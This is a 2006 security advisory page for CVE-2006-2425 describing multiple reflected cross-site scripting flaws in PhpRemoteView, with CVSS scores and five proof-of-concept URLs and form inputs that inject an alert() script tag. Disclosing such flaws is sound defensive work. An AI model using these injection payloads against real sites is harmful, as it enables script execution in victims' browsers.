Bug: PhpRemoteView Multiple Xss Vulnerabilities ( Ascii Version )

Search:
WLB2

PhpRemoteView Multiple Xss Vulnerabilities

Published
Credit
Risk
2006.05.18
Soothackers
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-2425
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

---------------------------------------------

PhpRemoteView Multiple Xss Vulnerabilities

---------------------------------------------

Site:

http://php.spb.ru/remview/

Bug:

1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</scri
pt>

2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>

3-

http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>

4-http://victim/path/PRV.php?c=d&d=[path]

MAKE DIR (type full path) : "><script>alert(/Soot/)</script>

5-http://victim/path/PRV.php?c=d&d=[path]

Full file name : "><script>alert(/Soot/)</script>

---------------------------------------------

Source :

http://soot.shabgard.org/bugs/phpremoteview.txt

Credit :

Soot

Shabgard Security Team

http://www.shabgard.org

Greetz :

Hregy,Elite,Bl2k,Littlehacker

---------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version